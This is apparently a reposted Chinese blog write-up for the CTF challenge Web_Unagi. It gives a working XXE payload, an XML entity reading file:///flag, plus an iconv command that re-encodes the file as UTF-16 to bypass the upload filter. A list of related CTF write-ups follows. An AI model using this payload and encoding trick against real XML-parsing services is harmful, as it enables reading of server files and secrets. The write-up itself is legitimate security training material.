BUUCTF:[CSAWQual 2019]Web_Unagi

其他 2020-09-08 10:39:52 阅读次数: 0

打开界面
在这里插入图片描述
看看其他有什么内容：

来看看格式事例：

从信息提示我们可以知道要通过编写xml文件上传
即通过XXE编码转换成utf-16编码绕过

我们可以利用vim编辑xml文件（取名为2.xml)
构造payload如下：

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>[email protected]</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
</users>

在这里插入图片描述
转换命令：

iconv -f utf8 -t utf-16 2.xml>1.xml

转换后可以看见：
在这里插入图片描述
将1.xml上传到upload即可拿到flag

猜你喜欢

转载自blog.csdn.net/m0_46481239/article/details/106622799

BUUCTF：[CSAWQual 2019]Web_Unagi

BUUCTF:[CSAWQual 2019]Web_Unagi

[CSAWQual 2019]Web_Unagi XXE漏洞 [HarekazeCTF2019]Avatar Uploader 1 finfo_file和getimagesize

[Web_Unagi]xxe注入过滤绕过

BUUCTF WEB [SUCTF 2019]CheckIn

buuctf web

BUUCTF WEB [RoarCTF 2019]Easy Calc

BUUCTF：[SWPU2019]Web3

XCTF Web 记录（unagi）

BUUCTF | [SUCTF 2019]CheckIn

BUUCTF [SUCTF 2019]EasySQL

BUUCTF：[GWCTF 2019]mypassword

BUUCTF：[BSidesCF 2019]Mixer

BUUCTF：[BSidesCF 2019]Kookie

BUUCTF：[ISITDTU 2019]EasyPHP

BUUCTF [SUCTF 2019]CheckIn

buuctf [ZJCTF 2019]EasyHeap

BUUCTF：[SUCTF 2019]EasySQL

BUUCTF web(一)

BUUCTF web writeup

buuctf—web—Easy Calc

BUUCTF平台web writeup

BUUCTF WEB Fakebook

BUUCTF web小结 1.0

Buuctf之web(五)

Buuctf之Web(四)

【BUUCTF】Web题解

BUUCTF WEB [强网杯 2019]高明的黑客

CTF-BUUCTF-Web-[强网杯 2019]高明的黑客

BUUCTF WEB [De1CTF 2019]SSRF Me

今日推荐

周排行

Leetcode简单题61~80

解决zookeeper磁盘IO高的问题

多线程相关方法详解

Maven-setting.xml文件详解

Maven 项目的 classpath 理解

渊亭科技大数据笔试题

配置JVM内存分配

计算机网络个人学习笔记（三）网络层：第三部分连载

js中两个等号(==)和三个等号(===)的区别

用C程序自动打开电脑上的程序

每日归档

2024-09-18(0)

2024-09-17(0)

2024-09-16(0)

2024-09-15(0)

2024-09-14(0)

2024-09-13(0)

2024-09-12(0)

2024-09-11(0)

2024-09-10(0)

2024-09-09(0)